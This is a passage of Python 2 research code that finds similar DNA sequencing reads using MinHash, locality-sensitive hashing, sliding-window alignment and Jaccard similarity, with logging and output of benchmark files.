candidatePairs[key] = set()
for mate in mates:
candidatePairs[key].add(mate)
# key = str(key)
# if d.has_key(key):
# temp_set = d[key]
# for mate in mates:
# temp_set.add(mate)
# d[key] = temp_set
# else:
# d[key] = set(mates)
start += numProcs
if start > bands:
start = bands
# for key in candidatePairs:
# print key, candidatePairs[key]
# shelvesList = [shelve.open("shelveDBs/cache"+str(b), "r") for b
# in xrange(1,bands)]
# for i in d.keys():
# finalSet = set(d[str(i)])
# #for b in xrange(1, bands):
# #d_temp = shelve.open("shelveDBs/cache"+str(b), "r")
# for d_temp in shelvesList:
# lst_temp = d_temp[i]
# #d_temp.close()
# for item in lst_temp:
# finalSet.add(item)
# d[str(i)] = list(finalSet)
#d.close()
logprint(log, False,
"Finished combining candidate pairs in",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
# q.close()
# for p in processes:
# p.join()
if prev_start == bands:
break
logprint(log, False, "\nNumber of unique candidate pairs",
sum(len(candidatePairs[i]) for i in candidatePairs)/2)
logprint(log, False, "Finished LSH in",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource(),
"\n")
# If benchmarking different k-values
if test == 3:
return (time.clock() - tim) / 60, memory_usage_resource(), \
sum(len(candidatePairs[i]) for i in candidatePairs)/2
return candidatePairs
else:
logprint(log, True, "ERROR: NO FASTA FILES OR IMPORT FILE PROVIDED")
sys.exit()
def getDocShingles(dna, k, asSet=True):
"""
Computes all shingles of size k in a document (dna sequence)
"""
if asSet:
shingles = {dna[i:i+k] for i in xrange(len(dna)-k+1)}
else: # as list
shingles = [toBase10(dna[i:i+k]) for i in xrange(len(dna)-k+1)]
return shingles
def toBase10(seq):
"""Compute the number from base 4 to base b."""
#digits = []
n = 0
for s in seq:
if s == "A":
i = 0
elif s == "C":
i = 1
elif s == "G":
i = 2
elif s == "T":
i = 3
n = 4 * n + i
return n
def minhashing(normal, diseased, kmers, buckets, k, rows, minhash_alg, bn, bs, p, log):
tim = time.clock()
logprint(log, True, "Minhashing...")
# random.seed(bn)
idx = 0
if minhash_alg < 4:
hashfuncs = computeHashFunctions(rows, kmers, log)
else:
if minhash_alg == 7:
n = 4**k
else:
n = len(kmers)
p = getPrime(n) # temp
a = [random.randrange(1, n) for i in xrange(rows)]
b = [random.randrange(n) for i in xrange(rows)]
for part in getPartsFromFile(normal, log):
if minhash_alg == 6: # Default minhash alg 6
minhashing_alg6(part, idx, kmers, buckets, k, rows, p, a, b, n)
elif minhash_alg == 7:
minhashing_alg7(part, idx, kmers, buckets, k, rows, p, a, b, n)
elif minhash_alg == 1:
minhashing_alg1(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 2:
minhashing_alg2(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 3:
minhashing_alg3(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 4:
minhashing_alg4(part, idx, kmers, buckets, k, rows, p, a, b)
elif minhash_alg == 5:
minhashing_alg5(part, idx, kmers, buckets, k, rows, p, a, b)
idx += 1
if idx % printMinhashProcess == 0:
logprint(log, True, "Band", bn+1, "of", str(bs)+":",
"Processed", idx, "documents in",
(time.clock() - tim) / 60, "minutes")
global secondSample
if secondSample == 0:
secondSample = idx
for part in getPartsFromFile(diseased, log):
if minhash_alg == 6: # Default minhash alg 6
minhashing_alg6(part, idx, kmers, buckets, k, rows, p, a, b, n)
elif minhash_alg == 7:
minhashing_alg7(part, idx, kmers, buckets, k, rows, p, a, b, n)
elif minhash_alg == 1:
minhashing_alg1(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 2:
minhashing_alg2(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 3:
minhashing_alg3(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 4:
minhashing_alg4(part, idx, kmers, buckets, k, rows, p, a, b)
elif minhash_alg == 5:
minhashing_alg5(part, idx, kmers, buckets, k, rows, p, a, b)
idx += 1
if idx % printMinhashProcess == 0:
logprint(log, True, "Band", bn+1, "of", str(bs)+":",
"Processed", idx, "documents in",
(time.clock() - tim) / 60, "minutes")
logprint(log, False, "Finished minhashing in",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return idx
def lshBand(buckets, b, candidatePairs, log):
tim = time.clock()
logprint(log, True, "Running LSH and finding similar pairs...")
numPairsUnique = 0
b += 1
naiveSim = 0.97
total = 0
o = 33 # overlap
skippedBuckets = 0
maxBucket = 0
numBucketsPrintet = 0
# logprint(log, False, "Bucket sizes:")
for bucket in buckets:
# if len(buckets[bucket]) > 1:
# logprint(log, False, str(bucket)+":", len(buckets[bucket]))
# if len(buckets[bucket]) > maxBucket:
# maxBucket = len(buckets[bucket])
# numBucketsPrintet += 1
if len(buckets[bucket]) > 500:
skippedBuckets += 1
continue
for i in xrange(len(buckets[bucket])):
id1 = buckets[bucket][i]
for j in xrange(i+1, len(buckets[bucket])):
id2 = buckets[bucket][j]
if id1 % 2 == 0 and id2 % 2 == 1:
if id1 + 1 != id2:
# naive = globalAlignment(seqs[id1], seqs[id2], o)
# if naive >= naiveSim:
# if id1 in candidatePairs:
# candidatePairs[id1].add(id2)
# else:
# candidatePairs[id1] = set([id2])
# if id2 in candidatePairs:
# candidatePairs[id2].add(id1)
# else:
# candidatePairs[id2] = set([id1])
# numPairsUnique += 1
# total += 1
if id1 in candidatePairs:
candidatePairs[id1].add(id2)
else:
candidatePairs[id1] = set([id2])
if id2 in candidatePairs:
candidatePairs[id2].add(id1)
else:
candidatePairs[id2] = set([id1])
numPairsUnique += 1
# if id1 in candidatePairs:
# candidatePairs[id1].append(id2)
# else:
# candidatePairs[id1] = [id2]
# if id2 in candidatePairs:
# candidatePairs[id2].append(id1)
# else:
# candidatePairs[id2] = [id1]
elif id1 % 2 == 1 and id2 % 2 == 0:
if id1 - 1 != id2:
# naive = globalAlignment(seqs[id1], seqs[id2], o)
# if naive >= naiveSim:
# if id1 in candidatePairs:
# candidatePairs[id1].add(id2)
# else:
# candidatePairs[id1] = set([id2])
# if id2 in candidatePairs:
# candidatePairs[id2].add(id1)
# else:
# candidatePairs[id2] = set([id1])
# numPairsUnique += 1
# total += 1
if id1 in candidatePairs:
candidatePairs[id1].add(id2)
else:
candidatePairs[id1] = set([id2])
if id2 in candidatePairs:
candidatePairs[id2].add(id1)
else:
candidatePairs[id2] = set([id1])
numPairsUnique += 1
# if id1 in candidatePairs:
# candidatePairs[id1].append(id2)
# else:
# candidatePairs[id1] = [id2]
# if id2 in candidatePairs:
# candidatePairs[id2].append(id1)
# else:
# candidatePairs[id2] = [id1]
logprint(log, True, "Number of buckets in band", str(b)+":", len(buckets))
logprint(log, False, "Skipped buckets:", skippedBuckets)
numPairs = 0
for bucket in buckets:
# print buckets[bucket]
numPairs += len(buckets[bucket]) * (len(buckets[bucket])-1) / 2
logprint(log, False, "Number of candidate pairs in band", str(b)+":",
numPairs)
logprint(log, True, "Number of unique candidate pairs in band",
str(b)+":", numPairsUnique)
logprint(log, False, "Total number of candidate pairs:", total)
# logprint(log, True, "Ratio:", float(numPairsUnique) / total)
# temp
#logprint(log, False, "Number of buckets:", len(buckets))
#logprint(log, False, "Max bucket size:", maxBucket)
#logprint(log, False, "Num buckets sizes printet:", numBucketsPrintet)
# print "Finished LSH for band", b, "in", (time.clock() - tim) / 60, \
# "minutes"
# print len(candidatePairs)
return None
def lshBandMultiCore(buckets, b, seqs, log, r=None):
tim = time.clock()
logprint(log, True, "Running LSH and finding similar pairs...")
numPairsUnique = 0
#d = shelve.open("shelveDBs/cache"+str(b), "c")
b += 1
naiveSim = 0.97
total = 0
o = 33 # overlap
skippedBuckets = 0
# SET VERSION
if setVersion:
pipe = r.pipeline()
for bucket in buckets:
for i in xrange(len(buckets[bucket])):
id1 = buckets[bucket][i]
for j in xrange(i+1, len(buckets[bucket])):
id2 = buckets[bucket][j]
if id1 % 2 == 0 and id2 % 2 == 1:
if id1 + 1 != id2:
pipe.sadd(id1,id2)
pipe.sadd(id2,id1)
numPairsUnique += 1
elif id1 % 2 == 1 and id2 % 2 == 0:
if id1 - 1 != id2:
pipe.sadd(id1,id2)
pipe.sadd(id2,id1)
numPairsUnique += 1
pipe.execute()
# LIST VERSION
elif r:
for bucket in buckets:
if len(buckets[bucket]) > 500:
skippedBuckets += 1
continue
for i in xrange(len(buckets[bucket])):
id1 = buckets[bucket][i]
mates = []
for j in xrange(len(buckets[bucket])):
id2 = buckets[bucket][j]
if id1 % 2 == 0 and id2 % 2 == 1:
if id1 + 1 != id2:
naive = globalAlignment(seqs[id1], seqs[id2], o)
if naive >= naiveSim:
mates.append(id2)
numPairsUnique += 1
total += 1
elif id1 % 2 == 1 and id2 % 2 == 0:
if id1 - 1 != id2:
naive = globalAlignment(seqs[id1], seqs[id2], o)
if naive >= naiveSim:
mates.append(id2)
numPairsUnique += 1
total += 1
r.put((id1, mates))
print "Dropping last"
r.put((-1, -1))
print "last dropped"
else:
candidatePairs = dict()
for bucket in buckets:
if len(buckets[bucket]) > 500:
skippedBuckets += 1
continue
for i in xrange(len(buckets[bucket])):
id1 = buckets[bucket][i]
for j in xrange(i+1, len(buckets[bucket])):
id2 = buckets[bucket][j]
if id1 % 2 == 0 and id2 % 2 == 1:
if id1 + 1 != id2:
naive = globalAlignment(seqs[id1], seqs[id2], o)
if naive >= naiveSim:
if id1 in candidatePairs:
candidatePairs[id1].append(id2)
else:
candidatePairs[id1] = [id2]
if id2 in candidatePairs:
candidatePairs[id2].append(id1)
else:
candidatePairs[id2] = [id1]
numPairsUnique += 1
total += 1
elif id1 % 2 == 1 and id2 % 2 == 0:
if id1 - 1 != id2:
naive = globalAlignment(seqs[id1], seqs[id2], o)
if naive >= naiveSim:
if id1 in candidatePairs:
candidatePairs[id1].append(id2)
else:
candidatePairs[id1] = [id2]
if id2 in candidatePairs:
candidatePairs[id2].append(id1)
else:
candidatePairs[id2] = [id1]
numPairsUnique += 1
total += 1
#return candidatePairs
#pipe = r.pipeline()
# for bucket in buckets:
# leftParts = []
# rightParts = []
# for item in buckets[bucket]:
# if item % 2 == 0:
# leftParts.append(item)
# else:
# rightParts.append(item)
# numPairsUnique += len(leftParts)*len(rightParts)
# for key in leftParts:
# #pipe.rpush(key, rightParts)
# #print key, rightParts
# #d[str(key)] = rightParts
# r.put((key, rightParts))
# for key in rightParts:
# #pipe.rpush(key, leftParts)
# #print key, leftParts
# #d[str(key)] = leftParts
# r.put((key, leftParts))
#pipe.execute()
# for key in d.keys():
# print key, d[key]
logprint(log, False, "Skipped buckets:", skippedBuckets)
logprint(log, False, "Number of buckets in band", str(b)+":",len(buckets))
logprint(log, False, "Number of unique candidate pairs in band",
str(b)+":", numPairsUnique)
logprint(log, False, "Total number of candidate pairs:", total)
logprint(log, True, "Ratio:", float(numPairsUnique) / total)
#d.close()
# print "Finished LSH for band", b, "in", (time.clock() - tim) / 60, \
# "minutes"
# print len(candidatePairs)
if not setVersion and not r:
return candidatePairs
return numPairsUnique
# ************************************************************************** #
# #
# Minhashing algorithms #
# #
# ************************************************************************** #
def minhashing_alg1(dna, idx, shingles, buckets, k, rows, hashfuncs):
"""
Uses pre-computed hash functions and first hash
"""
# Create minhash signatures as described in chapter 3 of the book Massive
# Data Mining
# Find signature for each document
docShingles = getDocShingles(dna, k)
signature = [None for i in xrange(rows)]
# For each row in the 'character matrix'
for sigPos in xrange(rows):
for i, h in enumerate(hashfuncs[sigPos]):
if shingles[h] in docShingles:
signature[sigPos] = i
break
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
def minhashing_alg2(dna, idx, shingles, buckets, k, rows, hashfuncs):
"""
Uses pre-computed hashFuncs and runs through each hash (whole matrix)
and saves smallest value which is in doc
"""
# Create minhash signatures as described in chapter 3 of the book Massive
# Data Mining
# Find signature for each document
docShingles = getDocShingles(dna, k)
signature = [None for i in xrange(rows)]
# For each row in the 'character matrix'
for r in xrange(len(shingles)):
# If the shingle is in the document, then
if shingles[r] in docShingles:
# Find the 'first' shingle relative to each permutation
for i in xrange(rows):
if signature[i] is None or signature[i] > hashfuncs[i][r]:
signature[i] = hashfuncs[i][r]
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
def minhashing_alg3(dna, idx, shingles, buckets, k, rows, hashfuncs):
"""
Uses pre-computed hashFuncs and table to find original shingle position,
then find new shingle with smallest position in hash function.
"""
# Create minhash signatures as described in chapter 3 of the book Massive
# Data Mining
# Find signature for each document
signature = []
docShingles = getDocShingles(dna, k)
numShingles = len(shingles)
for h in hashfuncs:
minVal = numShingles+1
for shingle in docShingles:
pos = shingles[shingle]
if h[pos] < minVal:
minVal = h[pos]
signature.append(minVal)
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
def minhashing_alg4(dna, idx, shingles, buckets, k, rows, p, a, b):
"""
Uses hash functions in the form ((a*pos+b) mod p) mod N,
where a and b random integers and p is prime and p > N.
Uses the first hash strategy.
"""
# Create minhash signatures as described in chapter 3 of the book Massive
# Data Mining
# Find signature for each document
docShingles = getDocShingles(dna, k)
signature = []
numShingles = len(shingles)
# For each row in the 'character matrix'
for sigPos in xrange(rows):
for i in xrange(numShingles):
val = ((a[sigPos]*i+b[sigPos]) % p) % numShingles
if shingles[val] in docShingles:
signature.append(i)
break
if len(signature)-1 != sigPos:
# Ugly fix, only happens when hashfunction creates collisions
signature.append(random.randrange(numShingles))
#print signature[-1]
if len(signature) == rows:
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
else:
print "FUCK MY LIFE"
sys.exit()
def minhashing_alg5(dna, idx, shingles, buckets, k, rows, p, a, b):
"""
Uses hash functions in the form ((a*pos+b) mod p) mod N,
where a and b random integers and p is prime and p > N.
Runs through each hash (whole matrix) and saves the smallest value which
exist in the dna.
"""
# Create minhash signatures as described in chapter 3 of the book Massive
# Data Mining
# Find signature for each document
docShingles = getDocShingles(dna, k)
signature = [None for i in xrange(rows)]
numShingles = len(shingles)
# For each row in the 'character matrix'
for r in xrange(numShingles):
# If the shingle is in the document, then
if shingles[r] in docShingles:
# Find the 'first' shingle relative to each permutation
for i in xrange(rows):
pos = ((a[i]*r+b[i]) % p) % numShingles
if signature[i] is None or signature[i] > pos:
signature[i] = pos
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
def minhashing_alg6(dna, idx, shingles, buckets, k, rows, p, a, b, n):
"""
DEFAULT MINHASH ALGORITHM
Uses hash functions in the form ((a*pos+b) mod p) mod N,
where a and b random integers and p is prime and p > N.
Computes original position of shingle by finding all shingles and
enumerating them, then store them in a table for fast look up.
Table is called shingles.
"""
# Find signature for each document
signature = []
#signature = array.array('l')
docShingles = getDocShingles(dna, k)
#numShingles = len(shingles)
for i in xrange(rows):
minVal = n
for shingle in docShingles:
pos = shingles[shingle]
val = ((a[i]*pos+b[i]) % p) % n
if val < minVal:
minVal = val
signature.append(minVal)
# print signature
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
def minhashing_alg7(dna, idx, shingles, buckets, k, rows, p, a, b, n):
"""
Uses hash functions in the form ((a*pos+b) mod p) mod N,
where a and b random integers and p is prime and p > N.
Computes original position of shingle by finding all shingles and
enumerating them, then store them in a table for fast look up.
Table is called shingles.
"""
# Find signature for each document
signature = []
#signature = array.array('l')
docShingles = getDocShingles(dna, k, False)
for i in xrange(rows):
minVal = n
for pos in docShingles:
#pos = shingles[shingle]
val = ((a[i]*pos+b[i]) % p) # % n
if val < minVal:
minVal = val
signature.append(minVal)
#print signature
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
# ************************************************************************** #
# #
# Similarity checkers #
# #
# ************************************************************************** #
def pairsFoundByLSH(normal, diseased, candidatePairs, k, b, r, log):
"""
Check which pairs, with similarity above the threshold t, are found by
LSH and which are missed
"""
seqsNormal = getAllReads(normal, log)
global secondSample
secondSample = len(seqsNormal)
seqsDiseased = getAllReads(diseased, log)
seqs = seqsNormal + seqsDiseased
filename = "alligator_20K_new5"
path = "lshPairsVsAllPairs/"
f1 = open(path+"naive_pairs_all_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
f2 = open(path+"jaccard_sets_pairs_all_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
f3 = open(path+"jaccard_bags_pairs_all_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
f4 = open(path+"naive_pairs_lsh_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
f5 = open(path+"jaccard_sets_pairs_lsh_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
f6 = open(path+"jaccard_bags_pairs_lsh_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
count = 0
numPairs = len(seqs) * (len(seqs)-1)
#sims = dict()
truePairs_naive = set()
truePairs_sets = set()
truePairs_bags = set()
sim_threshold = 0.4
naive_threshold = 0.97
doPrint = False
tim = time.clock()
truePairs_lsh_naive = set()
truePairs_lsh_sets = set()
truePairs_lsh_bags = set()
# Compute similarities for all pairs
for i in xrange(0,len(seqs),2):
for j in xrange(1, len(seqs),2):
if i+1 != j:
count += 1
naive = globalAlignment(seqs[i],seqs[j], 33)
jaccard_sets = jaccardSim(seqs[i], seqs[j], k)
jaccard_bags = jaccardSim(seqs[i], seqs[j], k, False)
#sims[(i,j)] = (naive, jaccard_sets, jaccard_bags)
if naive > 0.8 and jaccard_sets < 0.4:
logprint(log, False, seqs[i])
logprint(log, False, seqs[j])
logprint(log, True, "Naive:", naive, "Jaccard:",
jaccard_sets,"\n")
if naive > naive_threshold:
truePairs_naive.add((i,j))
f1.write(str(i)+","+str(j)+" "+str(naive)+"\n")
# if i in candidatePairs:
# if j in candidatePairs[i]:
# truePairs_lsh_naive.add((i,j))
# f4.write(str(i)+","+str(j)+" "+str(naive)+"\n")
if jaccard_sets > sim_threshold:
truePairs_sets.add((i,j))
f2.write(str(i)+","+str(j)+" "+str(jaccard_sets)+"\n")
# if i in candidatePairs:
# if j in candidatePairs[i]:
# truePairs_lsh_sets.add((i,j))
# f5.write(str(i)+","+str(j)+" "+
# str(jaccard_sets)+"\n")
if jaccard_bags > sim_threshold:
truePairs_bags.add((i,j))
f3.write(str(i)+","+str(j)+" "+str(jaccard_bags)+"\n")
# if i in candidatePairs:
# if j in candidatePairs[i]:
# truePairs_lsh_bags.add((i,j))
# f6.write(str(i)+","+str(j)+" "+
# str(jaccard_bags)+"\n")
if i in candidatePairs:
if j in candidatePairs[i]:
truePairs_lsh_naive.add((i,j))
f4.write(str(i)+","+str(j)+" "+str(naive)+"\n")
truePairs_lsh_sets.add((i,j))
f5.write(str(i)+","+str(j)+" "+str(jaccard_sets)+"\n")
truePairs_lsh_bags.add((i,j))
f6.write(str(i)+","+str(j)+" "+str(jaccard_bags)+"\n")
if doPrint:
print i,j
print seqs[i], seqs[j]
print naive
print jaccard_sets
print jaccard_bags
if count % 500000 == 0:
logprint(log, False, "Processed", format(count, ',d'),
"pairs in", (time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
processing_time = (time.clock() - tim) / 60
c = "{:,}".format(count).replace(",", ".")
logprint(log, False, "Processed", c, "pairs in", processing_time,
"minutes")
logprint(log, False, "Memory usage (in mb):", memory_usage_resource())
# logprint(log, False, "Difference jaccard sets vs naive\n",
# truePairs_sets.difference(truePairs_naive))
# logprint(log, False, "Difference naive vs jaccard sets\n",
# truePairs_naive.difference(truePairs_sets))
logprint(log, False, "Number of all pairs:", count)
# Compute similarites for lsh pairs
# totalPairs = 0
# truePairs_lsh_naive = set()
# truePairs_lsh_sets = set()
# truePairs_lsh_bags = set()
# for i in candidatePairs:
# for j in candidatePairs[i]:
# if i % 2 == 0:
# totalPairs += 1
# if sims[(i,j)][0] > sim_threshold:
# truePairs_lsh_naive.add((i,j))
# f4.write(str(i)+","+str(j)+" "+str(sims[(i,j)][0])+"\n")
# if sims[(i,j)][1] > sim_threshold:
# truePairs_lsh_sets.add((i,j))
# f5.write(str(i)+","+str(j)+" "+str(sims[(i,j)][1])+"\n")
# if sims[(i,j)][2] > sim_threshold:
# truePairs_lsh_bags.add((i,j))
# f6.write(str(i)+","+str(j)+" "+str(sims[(i,j)][2])+"\n")
logprint(log, False, "Naive pairs not found by LSH\n",
len(truePairs_naive.difference(truePairs_lsh_naive)))
logprint(log, False, "Jaccard set pairs not found by LSH\n",
len(truePairs_sets.difference(truePairs_lsh_sets)))
logprint(log, False, "Jaccard bag pairs not found by LSH\n",
len(truePairs_bags.difference(truePairs_lsh_bags)))
# logprint(log, False, "Number of lsh pairs:", totalPairs)
def findSimilarPairs(reads, candidatePairs, k, b, r, m, log):
"""
Find candidate pairs that has a similarity above the threshold t
"""
p = "coord_output/"
f1 = open(p+"naive_vs_jaccard_standard_NA19240_b"+str(b)+"_r"+
str(r)+"_k"+str(k)+"_m"+str(m)+".txt", 'w')
f2 = open(p+"naive_NA19240_b"+str(b)+"_r"+str(r)+
"_k"+str(k)+"_m"+str(m)+".txt", 'w')
f3 = open(p+"standard_jaccard_NA19240_b"+str(b)+"_r"+str(r)+
"_k"+str(k)+"_m"+str(m)+".txt", 'w')
f4 = open(p+"pairs_NA19240_b"+str(b)+"_r"+str(r)+
"_k"+str(k)+"_m"+str(m)+".txt", 'w')
f5 = open(p+"naive_and_jaccard_info_NA19240_b"+str(b)+"_r"+
str(r)+"_k"+str(k)+"_m"+str(m)+".txt", 'w')
counter = 0
logprint(log, True, "Finding similar pairs")
timer = time.clock()
numReads = len(reads)
maxNumPairs = len(candidatePairs) * (len(candidatePairs)-1)
logprint(log, True, "Number of reads", numReads)
for doc1 in candidatePairs:
for doc2 in candidatePairs[doc1]:
counter += 1
dna1 = reads[doc1]
dna2 = reads[doc2]
if doc1 % 2 == 0:
bestMatch1 = globalAlignment(dna1, dna2, False)
bestMatch2 = jaccardSim(dna1, dna2, k)
else:
bestMatch1 = globalAlignment(dna2, dna1, False)
bestMatch2 = jaccardSim(dna2, dna1, k)
if extraInfo:
f1.write(str(bestMatch1[0]) + " " + str(bestMatch2) + "\n")
f2.write(str(bestMatch1[0]) + " " + str(bestMatch1[1]) + " " +
str(bestMatch1[2]) + "\n")
f5.write(str(bestMatch1[0]) + " " + str(bestMatch1[1]) + " " +
str(bestMatch1[2]) + " " + str(bestMatch2) + "\n")
else:
f1.write(str(bestMatch1) + " " + str(bestMatch2) + "\n")
f2.write(str(bestMatch1) + "\n")
f3.write(str(bestMatch2) + "\n")
f4.write(str(doc1) + " " + str(doc2) + "\n")
if counter % 500000 == 0:
logprint(log, False, "Processed", format(counter, ',d'),
"pairs in", (time.clock() - timer) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
processing_time = (time.clock() - timer) / 60
c = "{:,}".format(counter).replace(",", ".")
logprint(log, False, "Processed", c, "pairs in", processing_time,
"minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
def globalAlignment(dna1, dna2, t, extraInfo=False):
"""
Aligning sequences by using a sliding window approach.
Returns the best score (matches / seqlength) between the two sequences.
doc1 is a leftpart and doc2 is a rightpart
"""
start = 0
start2 = 0
if len(dna1) > len(dna2):
#start2 = len(dna1) - len(dna2)
readLen = len(dna2)
else:
readLen = len(dna1)
if extraInfo:
bestScore = (0, 0, 0)
else:
bestScore = 0
seqLength = readLen-start
while seqLength > t:
# print seqLength, bestScore[1]
matches = 0
matches2 = 0
for i in xrange(seqLength):
# print len(doc1.dna)-start
if dna1[i] == dna2[i+start]:
matches += 1
if dna1[i+start] == dna2[i]:
matches2 += 1
# print bestScore
score = matches / float(seqLength)
score2 = matches2 / float(seqLength)
if extraInfo:
if score > bestScore[0]:
# print score, bestScore[0]
# print seqLength, matches, bestScore[1]
bestScore = (score, matches, seqLength)
if bestScore[0] == 1.0:
return bestScore
if score2 > bestScore[0]:
bestScore = (score2, matches2, seqLength)
if bestScore[0] == 1.0:
return bestScore
else:
if score > bestScore:
bestScore = score
if bestScore == 1.0:
return bestScore
if score2 > bestScore:
bestScore = score2
if bestScore == 1.0:
return bestScore
start += 1
seqLength = readLen-start
return bestScore
def jaccardSim(doc1, doc2, k, jaccard_sets=True):
"""
Computing the jaccard similarity.
Option to use jaccard bag similarity or standard jaccard similarity.
"""
# ## standard jaccard sim ## #
if jaccard_sets:
shingles1 = getDocShingles(doc1, k)
shingles2 = getDocShingles(doc2, k)
intersection = shingles1.intersection(shingles2)
if len(intersection) == 0:
return 0
union = shingles1.union(shingles2)
return float(len(intersection)) / len(union)
# ## Bag jaccard sim ## #
else:
shingles1 = getDocShingles(doc1, k, False)
shingles2 = getDocShingles(doc2, k, False)
counterA = Counter(shingles1)
counterB = Counter(shingles2)
intersection = sum((counterA & counterB).values())
if intersection == 0:
return 0
# Definition 1
#union = len(shingles1) + len(shingles2)# - intersection
# Definition 2
union = sum((counterA | counterB).values())
return float(intersection) / union
def makeSPlot(fasta_file, candidatePairs, k, b, r, alg, log):
"""
Method for used for obtaining information about the validity of the pairs
found by LSH
"""
### Used for saving each individual pairs similarity
# f1 = open("candidate_pairs_b"+str(b)+"_r"+str(r)+"_k"+str(k)+
# "_m"+str(alg)+"_all.txt", 'w')
# f2 = open("candidate_pairs_b"+str(b)+"_r"+str(r)+"_k"+str(k)+
# "_m"+str(alg)+"_lsh.txt", 'w')
# f3 = open("candidate_pairs_b"+str(b)+"_r"+str(r)+"_k"+str(k)+
# "_m"+str(alg)+"_rest.txt", 'w')
reads = getAllReads(fasta_file, log)
# Create a mapper to look up position in array given a similarity
n1 = len(reads[0])
n2 = len(reads[1])
maxNumShingles = (n1-k+1)+(n2-k+1)
possibleSims = set([0])
for i in xrange(1, n1):
for j in xrange(i, maxNumShingles-i+1):
possibleSims.add(float(i)/j)
posSimilarities = dict()
possibleSims = sorted(list(possibleSims))
for idx, sim in enumerate(possibleSims):
posSimilarities[sim] = idx
# print posSimilarities
# print len(posSimilarities)
allPairs = [0 for i in xrange(len(possibleSims))]
lshPairs = [0 for i in xrange(len(possibleSims))]
numReads = len(reads)
pairNum = 0
timer = time.clock()
count = 0
count2 = 0
process = 0
# for doc1 in xrange(numReads):
# start = 1
# if doc1 % 2 == 0:
# start = 3
# for doc2 in xrange(doc1+start, numReads, 2):
for doc1 in xrange(0, numReads, 2):
for doc2 in xrange(1, numReads, 2):
if i+1 != j:
dna1 = reads[doc1]
dna2 = reads[doc2]
jaccard = jaccardSim(dna1, dna2, k)
### Saves the similarity for each pair, and for pairs found by LSH
# if jaccard > 0:
# f1.write(str(pairNum) + " " + str(jaccard) + "\n")
# rest = True
# if doc1 in candidatePairs:
# if doc2 in candidatePairs[doc1]:
# f2.write(str(pairNum) + " " + str(jaccard) + "\n")
# rest = False
# count += 1
# if rest:
# f3.write(str(pairNum) + " " + str(jaccard) + "\n")
# count2 += 1
# pairNum += 1
if jaccard > 0:
pos = posSimilarities[jaccard]
if doc1 in candidatePairs:
if doc2 in candidatePairs[doc1]:
lshPairs[pos] += 1
count += 1
allPairs[pos] += 1
pairNum += 1
else:
allPairs[0] += 1
process += 1
if process % 500000 == 0:
logprint(log, True, "Processed", process,
"pairs in time:", (time.clock() - timer),
"Found", pairNum, "cand. pairs")
p = "s_plot/"
f = open(p+"s_shape_info_b"+str(b)+"_r"+str(r)+"_k"+str(k)+
"_m"+str(alg)+"_readsfa.txt", 'w')
for i in xrange(len(allPairs)):
if allPairs[i] == 0:
f.write(str(0)+" "+str(0)+" "+str(0)+
" "+str(possibleSims[i])+"\n")
else:
f.write(str(lshPairs[i])+" "+str(allPairs[i])+" "+
str(float(lshPairs[i]) / allPairs[i])+" "+
str(possibleSims[i]) + "\n")
logprint(log, False, "Candidate pairs found by LSH:", count)
logprint(log, False, "Number of pairs not found by LSH:", pairNum-count)
logprint(log, True, "Total number of pairs:", pairNum)
def euclideanDistance(doc1, doc2):
sig1, sig2 = doc1.signature, doc2.signature
# lol = sum([(x-y)**2 for x, y in itertools.izip(sig1, sig2)])
# if counter2 < 100:
# print doc1.id, doc2.id
# print sig1
# print sig2
# print lol
# else:
# sys.exit(0)
intersum = 0
for x, y in itertools.izip(sig1, sig2):
intersum
def longest_common_substring(s1, s2):
m = [[0] * (1 + len(s2)) for i in xrange(1 + len(s1))]
longest, x_longest = 0, 0
for x in xrange(1, 1 + len(s1)):
for y in xrange(1, 1 + len(s2)):
if s1[x - 1] == s2[y - 1]:
m[x][y] = m[x - 1][y - 1] + 1
if m[x][y] > longest:
longest = m[x][y]
x_longest = x
else:
m[x][y] = 0
return s1[x_longest - longest: x_longest]
def testLCS(doc1, doc2):
"""
Test longest_common_substring method
"""
sig1 = ''.join(map(str, doc1.signature))
sig2 = ''.join(map(str, doc2.signature))
seq = longest_common_substring(sig1, sig2)
# print (doc1.id, doc2.id),
# if counter2 < 100:
# print doc1.id, doc2.id
# print sig1
# print sig2
# print seq
# print
# else:
# sys.exit(0)
return seq
def NeedlemanWunsch(doc1, doc2):
"""
Sequence alignment using the Needleman-Wunsch algorithm
"""
# scores
match = 1
mismatch = -1
indel = -2
# seqA = "abcd"
# seqB = "bcd"
seqA = doc1.dna
seqB = doc2.dna
# scoreMatrix = [[0 for x in xrange(len(seqB)+1)] for x in
